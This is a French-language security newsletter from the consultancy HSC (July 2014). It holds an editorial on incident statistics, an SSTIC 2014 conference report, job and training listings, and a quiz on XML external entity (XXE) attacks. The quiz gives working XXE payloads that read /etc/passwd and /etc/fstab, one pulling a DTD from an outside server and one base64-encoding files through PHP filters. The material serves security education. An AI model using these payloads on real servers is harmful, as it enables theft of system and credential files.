[Newsletter HSC] N°119 - juillet 2014

Newsletter d'information de HSC newsletter at hsc-news.com
Mer 2 Juil 13:47:14 CEST 2014


========================================================================
              HSC Newsletter  --  N°119 --  juillet 2014
========================================================================





     « Un seul sport n'a connu ni arrêts ni reculs : le football. À quoi
       cela peut-il tenir sinon à la valeur intrinsèque du jeu lui-même,
       aux émotions qu'il procure, à l'intérêt qu'il présente ? »



                                        [ Pierre de Coubertin ]






--[ Sommaire ]----------------------------------------------------------

      1. Éditorial
      2. Le saviez-vous ? La question
      3. Compte-rendu du symposium SSTIC 2014
      4. Offres d'emploi HSC : consultants débutants et séniors
      5. Agenda des interventions publiques
      6. Prochaines formations HSC
      7. Actualité des associations : Club 27001, OSSIR et Clusif
      8. Le saviez-vous ? La réponse



--[ 1. Éditorial - Hervé Schauer ]--------------------------------------

     Pour sensibiliser les directions générales à la réalité des menaces,
 le discours selon lequel nous sommes tous concernés, ciblés et victimes ne
 suffit pas toujours. Il faut des chiffres. Cédric Perrin, de la DPSD
 (Ministère de la Défense), en a donné le 18 juin dernier lors de la
 conférence ARCSI (http://www.arcsi.fr/) à Toulouse, où HSC était sponsor.
 Un compte-rendu de la conférence est disponible chez GlobalSecurityMag [1].
     Cédric Perrin est en charge de la région Midi-Pyrénées qui couvre 150
 sites variés allant du géant Airbus, au binôme de chercheurs installés dans
 un garage. Depuis sa prise de poste, il y a 18 mois, Cédric Perrin a traité
 119 incidents de sécurité. La plupart des incidents étaient "mineurs",
 certains bénins (tel qu'une défiguration de serveurs web par exemple),
 d'autres moins (77 vols d'ordinateurs portables dont 13 ciblés). Mais la
 DPSD a également géré 9 attaques ciblées délibérées que le quidam qualifierait
 d''APT". 7 d'entre elles visaient des grands comptes et 2 des sociétés
 innovantes. 7 attaques ont été découvertes par des sondes réseau, une par
 corrélation des journaux avec OSSIM [2], et la dernière grâce à la vigilance
 d'une employée. Celle-ci a prévenu le correspondant d'une filiale de sa
 société qu'elle avait reçu un fichier Excel provenant prétendument de lui.
 Ce courriel "piégé" a été envoyé à 15 destinataires ciblés et infecté 3
 postes ainsi placés sous le contrôle de l'attaquant.
     Si les consultants réalisant des investigations numériques sont tous les
jours confrontés à cette réalité, nombreuses sont les directions générales qui
 considèrent encore la sécurité comme un simple "bonus" de leur activité.
 Espérons que ces quelques chiffres en auront convaincu certaines.

 [1] http://www.globalsecuritymag.fr/ARCSI-Apres-l-affaire-Snowden-la,20140618,45793.html
 [2] http://en.wikipedia.org/wiki/OSSIM



--[ 2. Le saviez-vous ? La question ]-----------------------------------

     Vous auditez la sécurité d'un site d'une agence de voyages. Au niveau du
 compte de l'utilisateur, il y a une fonctionnalité permettant l'export et
 l'import au format XML de commentaires sur les séjours passés via l'agence
 en ligne. Vous identifiez que la fonction d'import de fichier XML est
 vulnérable à un XXE (XML eXternal Entity). En effet, avec la charge utile
 ci-dessous, vous êtes en mesure d'afficher le contenu de certains fichiers
 (comme passwd) ce qui est intéressant, mais d'autres semblent poser problème.

 <!DOCTYPE xxe [<!ENTITY x SYSTEM "file:///etc/passwd">]>
 <xml><data>&x;</data></xml>

 Comment peut-on faire pour obtenir le contenu du fichier /etc/fstab (par
 exemple) qui pose problème avec la méthode ci-dessus ?

 À noter que suivant les applications et services accessibles sur le serveur
 vulnérable, d'autres fichiers plus critiques que fstab pourront être ciblés.

     Réponse au paragraphe 8.



--[ 3. Compte-rendu du SSTIC 2014 ]--------------------------------------
       par Johann Broudin, Baptiste Dolbeau, Hervé Schauer, Cyril Solomon

   Cette édition du SSTIC a cette année encore répondu à toutes ses promesses
 avec des conférences et des rumps variées et de qualité. Nous vous présentons
 ici une partie, n'hésitez pas à visiter le site du SSTIC[1] pour lire les
 transparents et les actes de l'ensemble des conférences.

 [1] https://www.sstic.org/2014/actes/

 === Keynote d'ouverture ===
 Travis Goodspeed introduit cette nouvelle édition du SSTIC. Il nous présente
 son "International Journal of PoC||GTFO", un journal orienté vers la preuve
 que quelque chose est possible par sa réalisation concrète. Au travers de 
 ses découvertes, il nous rappelle que l'esprit du Hacker est de communiquer
 avec les autres et qu'il est important de partager ses connaissances afin
 d'aller toujours plus loin. Il présente ainsi une technique intéressante
 d' anti-analyse inforensique sur les disques durs, l'utilisation de fichier
 PGP s'auto-encapsulant et créant des bogues dans les implémentations, un
 fichier ZIP qui est aussi un PDF, un fichier qui est valide avant et après
 son chiffrement et enfin un fonctionnement étrange de la gestion des
 encodages dans Python.

 === Analyse de la sécurité d'un Active Directory avec l'outil BTA ===
 Dans le cadre de l'audit d'un Active Directory, Philippe Biondi et Joffrey
 Czarny de EADS Airbus Group nous présentent leur outil BTA ainsi que leur
 méthodologie pour obtenir rapidement un état des lieux d'un domaine existant.
 Codé en python, il utilise MongoDB pour base de données et la bibliothèque
 libeset pour le parsage des informations du fichier NTDS.dit. BTA est très
 modulaire, car composé de plusieurs entités chargées d'un travail spécifique.
 Leur retour d'expérience fait état essentiellement de mauvaises pratiques
 d'administration, toujours présentes dans un domaine.

 === Chemin de contrôle en environnement Active Directory ===
 Toujours sur le même sujet, mais avec un point de vue différent, Lucas
 Bouillot et Emmanuel Gras de l'ANSSI présentent leur propre outil d'audit d'un
 Active Directory. L'idée intéressante qu'ils présentent est de remarquer que
 les administrateurs d'un domaine ne sont pas seulement les membres du groupe
 "Admins du domaine". Par exemple, un administrateur d'un serveur sur lequel
 se connecte un administrateur du domaine pourra installer des portes dérobées
 ou utiliser un outil tel que Mimikatz pour obtenir le mot de passe de
 l'administrateur.
 Ils sont ainsi partis de cette idée et ont mis en place de nombreuses liaisons
 qui permettent de devenir administrateur du domaine par le rebond successif
 (par exemple par des droits sur des GPO ou les hiérarchies d'objets de
 l'annuaire).
 Ils présentent ainsi leur outil qui va permettre de créer un graphe
 exploitable de l'ensemble de ces relations permettant d'aider à l'analyse de
 ce type de relations.

 === Secrets d'authentification épisode II : Kerberos contre-attaque ===
 Pour cette troisième présentation sur les annuaires Active Directory, Aurélien
 Bordes nous présente plus en détail le fonctionnement de Kerberos et comment
 un attaquant peut l'utiliser pour maintenir ses privilèges sur le domaine.
 Pour s'authentifier sur un serveur, un utilisateur va :
 1) récupérer un ticket "TGT" auprès du domaine
 2) utiliser ce ticket pour obtenir un ticket "TS" permettant de se connecter
 sur le serveur
 3) envoyer le ticket au serveur qui acceptera l'authentification.

 Pour permettre au serveur de lire le ticket TS sans qu'il soit modifiable par
 l'utilisateur, le domaine chiffre ce ticket à l'aide de l'empreinte de la
 machine sur le domaine (les utilisateurs avec un $ sur le domaine). La machine
 connaissant sa propre empreinte peut alors vérifier le ticket. De plus, le
 ticket TGT est chiffré à l'aide de l'empreinte d'un utilisateur spécial,
 krbtgt, qui n'a pas de droit particulier sur l'AD et qui est désactivé.

 Le problème en cas de compromission est alors que l'attaquant a accès à
 l'ensemble des clés permettant le chiffrement des tickets puisqu'il a obtenu
 les empreintes des utilisateurs du domaine. Ainsi, lors de la compromission
 d'un domaine il n'est pas seulement nécessaire de changer les mots de passe de
 vos utilisateurs. Il faut réfléchir au changement des empreintes des machines
 et de l'utilisateur krbtgt sans quoi un attaquant gardera un accès complet au
 domaine.

 === Analyse de la sécurité des modems des terminaux mobiles ===
 Benoit Michau a présenté la démarche utilisée par le laboratoire de l'ANSSI
 afin d'évaluer le niveau de sécurité du modem utilisée par des terminaux
 mobiles grands publics. Après une brève présentation des différentes
 technologies utilisées pour les télécommunications (2G, 3G, LTE), il
 présente les différents équipements mis en place pour le développement du
 banc de tests. L'objectif de cette présentation était de démontrer qu'il
 n'était pas nécessaire d'avoir un investissement financier important pour
 pouvoir réaliser les mêmes tests.

 === How to play Hooker : Une solution d'analyse automatisée de markets
 Android ===
 Après une présentation du modèle de sécurité utilisé par Android, Dimitri
 Kirchner se pose la question de la nécessité des droits annoncés par une
 application lors de son installation. Afin de répondre à cette problématique,
 Hooker, une solution d'analyse statique et dynamique des applications, a été
 développée. Elle est basée sur l'utilisation d'androguard pour l'analyse
 statique et de la librairie Substrate pour la partie dynamique. Suite à cette
 analyse, ils ont développé une application web permettant de faire des
 analyses statistiques sur le niveau d'intrusion des applications.

 === Investigation numérique sur les équipements Apple ===
 Mathieu Renard commence par une présentation des mécanismes de sécurité et de
 l'architecture utilisée par les appareils Apple ('secure boot', 'sandbox').
 Suite à cela, il aborde la principale problématique pour la réalisation
 d'analyse inforensique sur ce type d'équipement. Dans un premier temps,
 il présente la problématique de l'acquisition physique qui est très difficile,
 il poursuit ensuite par la présentation de plusieurs techniques permettant de
 réaliser une acquisition logique au travers de l'exploitation de vulnérabilité
 permettant d'exécuter du code non signé et d'accéder au système de fichiers.

 === Sécurité des ordivisions ===
 Toujours concernant les objets connectés, Frédérique Basse nous présente
 un moyen d'accéder au firmware d'une SmartTV Phillips. Il n'est en effet pas
 possible d'accéder directement à celui-ci puisque les fichiers de mise à jour
 sont chiffrés. Ainsi, après avoir identifié un service UPnP à l'aide de la
 sortie console, il exploite la CVE2012-5859 pour déposer un shell dans la
 mémoire dont les adresses ne sont pas aléatoires. Après analyse, il s'avère
 qu'il reste encore du travail à fournir pour sécuriser ce genre d'objet.

 === La radio qui venait du froid ===
 Alain Schneider nous expose ici les différentes méthodes d'écoute du chipset
 NRF24L01+. Ce dernier est utilisé dans de nombreux objets comme les claviers,
 jouets, etc. La difficulté d'écoute des paquets transitant (dûe à l'absence 
 de connaissances comme le canal utilisé, la taille des paquets, etc.) est 
 résolue grâce aux astuces de Travis Goodspeed qui consiste en la
 réinterprétation du début d'un préambule radio. Ceci permet la capture de
 paquets sans en connaitre la destination. Un tri final sur les adresses de
 destinations répétées nous permet d'obtenir les paquets valides.

 === Reboot: Bootkit revisited ===
 Samuel Chevet commence par une présentation des 'bootkit', il présente un
 mécanisme de sécurité depuis Windows 7 (64 bits) obligeant l'utilisation
 de pilotes signés. Afin de pouvoir passer au travers de ce mécanisme, il
 est nécessaire de compromettre le service lors de son démarrage. Il
 présente alors le processus de lancement de Windows ainsi que l'évolution
 des logiciels malfaisants modifiant le système de démarrage du système.
 Après cela, il présente les points négatifs de ces solutions, n'étant pas
 modulable et ne pouvant être utilisé dans le cadre d'un système utilisant
 TrueCrypt ou Bitlocker. Il montre alors son projet, Reboot qui est une
 preuve de concept d'un micronoyau permettant de charger Windows, prenant
 notamment en charge Bitlocker.

 === Reconnaissance réseau à grande échelle ===
 La conférence d'Adrien Guinet et de Fred Raynal de Quarkslab porte sur les
 différentes difficultés rencontrées lors d'un scan de grande envergure. Il
 est en effet compliqué de ne scanner qu'un seul pays par exemple. Une des
 billes possibles est d'utiliser la base gratuite de GeoIP localisant
 géographiquement les adresses IP. Pour éviter les "abuse", ils ont écrit
 la bibliothèque libre libleeloo qui permet de transformer une liste d'IP
 afin qu'elles soient réparties aléatoirement. Cette liste est ensuite utilisée
 par un indexeur qui répartira les adresses sur des serveurs disséminés un peu
 partout sur l'Internet. La question de la légalité est tout de même abordée
 durant les questions finales. Cette dernière est apparemment résolue selon
 l'intention de la personne à l'initiative du scan.

 === Martine monte un CERT ===
 Nicolas Bareil donne son retour d'expérience sur la mise en place d'un CERT
 au niveau du groupe Airbus et les difficultés rencontrées. Il a mis en avant
 les attaques qui n'étaient pas des 'APT' dans le sens où celles-ci se
 limitaient à de "simples" 'poison ivy'. Souvent, ces incidents ne sont pas
 détectés en interne, mais par le biais de services externes. Il présente
 les différents mécanismes mis en place pour améliorer la détection des
 incidents au travers de collecteurs propriétaires présents sur les postes
 clients, aucun logiciel libre n'ayant répondu à leur attente.

 === Élaboration d'une représentation intermédiaire pour l'exécution concolique
    et le marquage de données sous Windows ===
 Sébastien Lecomte présente son outil de 'fuzzing' automatique pour les
 plateformes Windows en commençant par une présentation de l'algorithme
 utilisé et par la représentation intermédiaire utilisée par son outil
 pour évaluer les différentes branches d'exécution du programme.
 Dans un second temps, il présente les différents outils  utilisés (Z3 et
 PIN) pour la réalisation de son projet et termine la présentation par une
 démonstration.

 === Obfuscation de code Python : amélioration des techniques existantes ===
 Serge Guelton et Ninon Eyrolles de Quarkslab se sont penché sur les
 améliorations possibles des techniques d'obfuscation en python en prenant
 comme cas d'étude le client Dropbox. En effet, bien que celui-ci ait été
 sujet à beaucoup de transformations, il reste relativement simple d'accéder
 au code source. Le chargement statique, bien que compliqué dans certains cas,
 des modules empêcherait l'exploitation de potentielles vulnérabilités. De
 plus, l'interpréteur étant embarqué dans le packing, il est intéressant de
 ne pas inclure certaines fonctionnalités comme l'accès au champ co_code. La
 transformation du code source des modules standards permet également
 d'empêcher, ou tout du moins de ralentir, l'attaquant. Enfin, il est possible
 de rendre plus compliquée la décompilation du bytecode en ajoutant, par
 exemple, des opcodes inutiles, qui tromperont les outils génériques de
 décompilation python comme uncompyle2 ou pycdc.

 === Haka : un langage orienté réseaux et sécurité  ===
 Kevin Denis, Paul Fariello, Pierre Sylvain Desse et Mehdi Talbi d'Arkoon
 proposent HAKA, langage basé sur lua du fait de sa simplicité et sa notoriété
 pour écrire des filtres. Modulaire, l'architecture de HAKA permet une gestion
 fine de ses composants et un ajout spécifique de l'utilisateur selon son
 besoin. Les règles de sécurité correspondent à un point de branchement ainsi
 qu'une fonction à exécuter lorsque le point de branchement est rencontré.

 === Les rumps ! ===
 L'un des plus grands moments du SSTIC, juste après le social event, les rumps
 sont des présentations courtes où tout le monde peut venir présenter en
 quelques secondes ses travaux, un outil ou autre. Voici celles que nous
 avons retenu.

 Cette année, mention spéciale pour Pierre Capillon et Pierre-Michel Ricordel
 pour leur rump illustrant les possibilités d'exfiltration de données par des
 terminaux mobiles non connectés.  Pour illustrer ces risques, ils proposent à
 la salle d'installer Audacity et d'activer leur micro. Lors de leur
 présentation, ils vont alors faire afficher du texte et des photos sur les
 spectrogrammes affichés par le logiciel. Aucun son dans la salle, tout passe
 par les ultrasons, inaudibles. Très visuel et impressionnant, on comprend vite
 ce qu'il peut être possible de faire et les risques associés si ce n'est pas
 un humain mais une machine qui interprète le signal reçu.

 Guillaume Delugré présente son attaque sur le chiffrement des SMS par Perseus.
 La conclusion est sans appel : en quelques heures les SMS sont déchiffrés et
 lus par l'attaquant. Un bel exemple des problèmes qui arrivent quand on tente
 d'implémenter sa propre cryptographie.

 Renaud Dubourgais et Nicolas Collignon ont présenté leur méthode de
 contournement des IDS par l'utilisation de TCP FAST OPEN. Simple et efficace,
 cette attaque ne souffre que du faible support de TFO dans les produits du
 marché (ce qui expliquera peut-être aussi son absence dans les IDS).

 Aurélien Bordes a présenté la fonctionnalité d'Outlook de créer des
 évènements privés. Il en ressort que ces évènements sont en réalité
 accessibles à tous et c'est uniquement l'interface du client qui cache
 l'évènement. À noter que ce "problème" est correctement documenté par
 Microsoft.

 Serge Guelton présente un obfuscateur LLVM sous forme d'un jeu de rôle où le
 public choisit les étapes d'obfuscation à l'image d'un "livre dont vous êtes
 le héros". Une présentation où la forme était aussi intéressante que le fond.

 Gaetan Duchaussois présente comment ils ont arrêté l'attaque DDOS de Bryan.
 En fournissant un simple cookie à l'attaquant qui accède toujours à la même
 page pendant l'attaque pour déterminer si le site est encore fonctionnel, ils
 ont pu retrouver suffisamment d'information sur l'attaquant pour déterminer
 quel compte il utilisait sur leur site.  Il leur a alors suffi de couper le
 compte pour faire arrêter les attaques du jour au lendemain.



--[ 4. Offres d'emploi HSC pour consultants en sécurité ]----------------

     HSC recherche des consultants brillants, débutants ou expérimentés,
 avides de partager et de s'épanouir dans une équipe indépendante,
 pluri-disciplinaire, qui couvre tous les aspects liés à la SSI, de la
 rétroingéniérie à la gouvernance, des systèmes industriels et embarqués à
 la gestion des risques, des technologies sans-fil à la résilience, de
 l'inforensique à l'ingénierie sociale...

     Les ingénieurs sélectionnés pourront être formés à la sécurité par HSC
 (intrusion, inforensique, Windows, SCADA, ISO27001, ISO22301, EBIOS, etc.),
 soit 2 à 6 semaines de formations suivies dans le cadre de la prise de
 fonction.

     HSC recherche également des stagiaires pour des stages de pré-embauche.

     Tous les postes sont basés à Levallois-Perret (Paris), à 5 minutes de la
 gare Saint-Lazare. Les locaux sont spacieux et climatisés (735 m2), avec
 réfectoire et espace détente. Si vous souhaitez proposer votre candidature,
 nous vous remercions d'envoyer votre CV en texte ASCII (pas de .doc ni .docx)
 par courrier électronique à cv at hsc.fr.



--[ 5. Agenda des interventions publiques ]------------------------------

 - 1 juillet 2014 - Matinée CNIS Mag - Paris Hôtel Intercontinental
   "Entreprise Mobile, Sociale et dans le Cloud : comment assurer sa
   cybersécurité ?", Introduction de la matinée par Frédéric Connes
   http://www.cnis-mag.com/entreprise-mobile-sociale-et-dans-le-cloud-comment-assurer-sa-cybersecurite-2.html

 - 9 septembre 2014 - Paris
   "Compte-rendu des conférences BlackHat/DEFCON" par Steeve Barbeau
   et Inès Ribeiro
   http://www.ossir.org/paris/calendrier/index.shtml

 Retrouvez l'agenda de nos interventions publiques sur
 http://www.hsc.fr/conferences/agenda.html.fr



--[ 6. Prochaines formations HSC ]---------------------------------------

     Nos prochaines formations sont les suivantes :

 - Paris
        ISO 27005 Risk Manager    ..............    : 8 au 10 septembre (#)
        Essentiels de l'ISO22301    ............    : 11 septembre
        Gestion de crise IT/SSI    .............    : 12 septembre
        Inforensique Windows (SANS FOR408/GIAC GCFE): 15 au 19 septembre (*)(#)
        ISO 27001 Lead Auditor    ..............    : 15 au 19 septembre (#)
        Essentiel de PCI-DSS    ................    : 22 septembre
        Protéger les applis web (DEV522 /GIAC GWEB) : 22 au 26 septembre (*)(#)
        ISO 27001 Lead Implementer    ..........    : 22 au 26 septembre (#)
        Correspondant Informatique et Libertés      : 24 au 26 septembre (@)
        Essentiels techniques de la SSI    .....    : 29 et 30 septembre
        ISO 22301 Lead Implementer    ..........    : 29 sept au 3 octobre (#)
        Essentiels de l'ISO27001:2013    .......    : 6 octobre
        Formation RSSI    ......................    : 6 au 10 octobre
        Essentiels juridiques pour gérer la SSI     : 13 et 14 octobre
        Formation CISSP    .....................    : 13 au 17 octobre (#)
        Tests d'intrusion avancés, exploits,
        hacking éthique (SANS SEC560 / GIAC GPEN)   : 13 au 17 octobre (*)(#)
        ISO 27005 Risk Manager    ..............    : 20 au 22 octobre (#)
        Fondamentaux & principes de la SSI
        (SANS SEC401/GIAC GSEC)   ..............    : 20 au 25 octobre (*)(#)
        Mesures de sécurité ISO 27002:2013   ...    : 23 au 24 octobre
        Sécurité du Cloud Computing    .........    : 27-29 octobre
        RGS : la SSI pour le secteur public    .    : 30 octobre
        ISO 22301 Lead Auditor    ..............    : 3 au 7 novembre (#)
        Rétroingénierie de logiciels malfaisants
        Analyse Inforensique avancée et réponse aux
        incidents (SANS FOR508 / GIAC GCFA)    .    : 3 au 7 novembre (*)(#)
        Essentiels Informatique et Liberté   ...    : 12 novembre
        EBIOS Risk Manager    ..................    : 12 au 14 novembre (#)
        Sécurité SCADA  ........................    : 13 at 14 novembre
        Tests d'intrusion des applications web et
        hacking éthique (SANS SEC542 / GIAC GWAPT)  : 17 au 21 novembre (*)(#)
        ISO 27001 Lead Implementer    ..........    : 17 au 21 novembre (#)
        ISO 27005 Risk Manager    ..............    : 24 au 26 novembre (#)
        Outils et techniques d'analyse
        (SANS FOR610/GIAC GREM)   ..............    : 24 au 28 novembre (*)
        Formation DNSSEC   .....................    : 27 et 28 novembre (*)
        ISO 27001 Lead Auditor    ..............    : 1 au 5 décembre (#)
        Correspondant Informatique et Libertés      : 3 au 5 décembre (@)
        Tests d'intrusion avancés, exploitation de
        failles et hacking éthique (SEC660/GXPN)    : 1 au 6 décembre (*)(#)
        Essentiels de l'ISO27001:2013    .......    : 8 décembre
        Expert Sécurité Linux    ...............    : 8 au 12 décembre (*)(#)
        Indicateurs & tableaux de bord SSI/ISO27004 : 11 décembre
        Gestion des incidents de sécurité/ISO27035  : 12 décembre
        Essentiels juridiques pour gérer la SSI     : 12 et 13 décembre
        Risk Manager Avancé    .................    : 18 et 19 décembre
        Sécurité du WiFi    ....................    : mars 2015  (*)
        Techniques de hacking, exploitation de failles
        et gestion des incidents (SEC504/GCIH)      : avril 2015 (*)(#)
        PKI : principes et mise en oeuvre    ...    : mai 2015 (*)
        Inforensique ordiphones/tablettes (FOR585)  : 1er semestre 2015 (*)(#)
        Sécuriser Windows (SANS SEC505/GIAC GCWN)   : 1er semestre 2015 (*)(#)
        Inforensique réseau avancé (SANS FOR572)   : 1er semestre 2015 (*)
        Tests d'intrusion avancés des applications
        web et hacking éthique (SANS SEC642)  ...   : 2eme semestre 2014 (*)

 (*) : formations avec travaux pratiques, avec un ordinateur par stagiaire
 (#) : formations certifiantes par LSTI, ISC2, GIAC ou LPI
 (@) : formation labellisée par la CNIL (www.cnil.fr)
 (C) : session de formation complète

 - Luxembourg
        ISO 27001 Lead Implementer    ..........    : 29 sept au 4 octobre (#)
        ISO 27005 Risk Manager    ..............    : 8 au 10 octobre (#)
        ISO 22301 Lead Implementer    ..........    : 27 au 31 octobre (#)
        Formation CISSP    .....................    : juin 2015 (#)
        ISO 27001 Lead Auditor    ..............    : octobre 2015 (#)

 - Lyon
        Essentiels juridiques pour gérer la SSI     : 28 au 29 novembre
        Correspondant Informatique et Libertés      : mars 2015 (@)
        ISO 27005 Risk Manager    ..............    : avril 2015 (#)

 - Marseille
        Essentiels juridiques pour gérer la SSI     : 15 au 16 septembre
        Correspondant Informatique et Libertés      : 19 au 21 novembre (#)

 - Rennes
        Essentiels de l'ISO27001:2013    .......    : 4 novembre
        Essentiels juridiques pour gérer la SSI     : 12 et 13 décembre
        Correspondant Informatique et Libertés      : mai 2015 (@)

 - Toulouse
        Correspondant Informatique et Libertés .    : 1 au 3 octobre (@)
        Essentiels de l'ISO27001:2013    .......    : 17 octobre
        ISO 27005 Risk Manager    ..............    : novembre - date exacte en
                                                      cours de confirmation (#)
        ISO 27001 Lead Implementer    ..........    : juin 2015 (#)

 (#) : formations certifiantes
 (@) : formation labellisée par la CNIL (www.cnil.fr)

 HSC est certifiée OPQF (http://www.opqf.com/) et ISO9001 par Intertek sur
 ses formations.

 Pour tout renseignement ou inscription, contactez François Martinelli
 (remplaçant de Lynda Benchikh qui sera en congé maternité du 1er juillet
 jusqu'au 29 octobre 2014) : formations at hsc.fr -- +33 141 409 704

 Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
 notre catalogue 2014 en PDF sur http://www.hsc-formation.fr/



--[ 7. Actualité des associations : Club 27001, OSSIR et Clusif ]---------

  o Club 27001 (http://www.club-27001.fr/)
     . Assemblée générale du Club vendredi 11 juillet à 14h00 chez HSC
     . Prochaine réunion à Paris le jeudi 25 septembre
         - "La série des guides ISO 27034" par Sébastien Gioria (Advens)
         - seconde présentation en cours de confirmation
     . Réunion suivante à Paris jeudi 27 novembre
     . Prochaine réunion à Toulouse vendredi 4 juillet
     . Autres prochaines réunions annoncées sur
       www.club-27001.fr et dans les listes électroniques. Inscrivez-vous
       sur les listes de chaque ville sur www.club-27001.fr pour suivre
       l'activité du Club 27001 en région.

 o OSSIR (http://www.ossir.org/)
     . Prochaine réunion à Paris le mardi 8 juillet chez Solucom La Defense
         - CP/32764 backdoor par Eloi Vanderbéken (Synacktiv)
         - Cas concrets de fraudes et intrusions par Pierre Texier (XMCO)
         - Revue d'actualité par Jean-Philippe Gaulier, Ary Kokos, Vladimir
           Kolla et Arnaud Souillié
     . Prochain AfterWorks OSSIR à Paris le mardi 23 septembre à la Kolok
     . Réunion suivante à Paris le mardi 9 septembre
         - Compte-rendu des conférences BlackHat/DEFCON par Steeve Barbeau
           et Inès Ribeiro (Hervé Schauer Consultants)
         - IRMA : Incident Response & Malware Analysis par Bruno Dorsemaine
           (Orange)
     . Réunion suivante à Paris le mardi 14 octobre
     . Prochaine réunion à Toulouse 1er juillet à 14h00 à l'Université Tls-1
         - "Fast forensics : la réponse à incidents quand l'heure tourne"
           par Sébastien Larinier (Sékoia)
         - "Évaluation d'un relais inverse en sécurité par défaut :
           Ngnix + Naxsi" par Mathieu Tham (Université Toulouse 1 Capitole)
     . Prochaine réunion à Rennes au second semestre

 o Clusif (http://www.clusif.fr/)
     . Publication du document « Cybersécurité des systèmes industriels : par
       où commencer ? Panorama des référentiels et synthèse des bonnes
       pratiques » par le groupe Sécurité SCADA co-animé par Hervé Schauer
http://www.clusif.fr/fr/production/ouvrages/pdf/CLUSIF-2014-SCADA-Panorama-des-referentiels.pdf
       Annexe, contenant les fiches de lecture des 20 référentiels sélectionnés
http://www.clusif.fr/fr/production/ouvrages/pdf/CLUSIF-2014-SCADA-Annexes-Fiches-de-lecture.pdf



--[ 8. Le saviez-vous ? La réponse ]-------------------------------------

     L'un des inconvénients de la charge utile citée précédemment concerne le
 type de données que contient le fichier à récupérer. En effet, si ce fichier
 contient les caractères '&', '<' ou '>', il est fort probable que ces derniers
 rendent le bloc de données XML malformaté (ex: absence de balise
 ouvrante/fermante, etc.) ce qui fera échouer le traitement des données XML par
 le parseur XML et aucun retour (si ce n'est une éventuelle erreur) ne sera
 visible.

 Il faut donc chercher à encapsuler le contenu du fichier à récupérer afin
 d'éviter le moindre "conflit" entre son contenu et la structure XML.

 L'une des méthodes permettant d'encapsuler ce type de données est
 l'utilisation de section CDATA. Ainsi les données situées entre la séquence
 de début "<![CDATA[" et la séquence de fin "]]>" seront simplement
 interprétées comme de simples caractères et non comme d'éventuelles entités
 XML.

 Ainsi, la charge utile suivante va permettre la création de cette enveloppe
 CDATA :

 <?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE xxe [ 
 <!ENTITY % start "<![CDATA[">
 <!ENTITY % content SYSTEM "file:///etc/fstab">
 <!ENTITY % end "]]>">
 <!ENTITY % dtd SYSTEM "http://monserveur/cdata.dtd">
 %dtd;
 ]>
 <xml>
 <data>&bim;</data>
 </xml>

 Le fichier cdata.dtd hébergé sur "monserveur" contient la ligne suivante :

 <!ENTITY bim "%start;%content;%end;">

 Lorsque le parseur XML évaluera l'entité "bim", il concatènera le contenu des
 entités de type paramètre (%dtd;) avant de l'intégrer au contenu XML, ce qui
 donnera :

 <xml> <data><![CDATA[ ... ]]></data> </xml>

 N. B. Cet exemple est fonctionnel avec le parseur Xerces de Java. Suivant le
 langage et/ou le parseur, le comportement peut être différent.


 En PHP, le "handler" php:// peut être utilisé afin de manipuler le contenu du
 fichier avant extraction. Il est par exemple possible de compresser le fichier
 puis de l'encoder en base64 (afin d'être compatible avec le format XML) :

 <!DOCTYPE xxe [ <!ENTITY file SYSTEM
 "php://filter/read=bzip2.compress/read=convert.base64-encode/resource=/etc/passwd">
 ]> <xml> <data>&bim;</data> </xml>

 Cette dernière méthode a l'avantage de permettre la récupération de fichiers
 binaires (base SQLite, container truecrypt, etc.).

-- Steeve Barbeau




Plus d'informations sur la liste de diffusion newsletter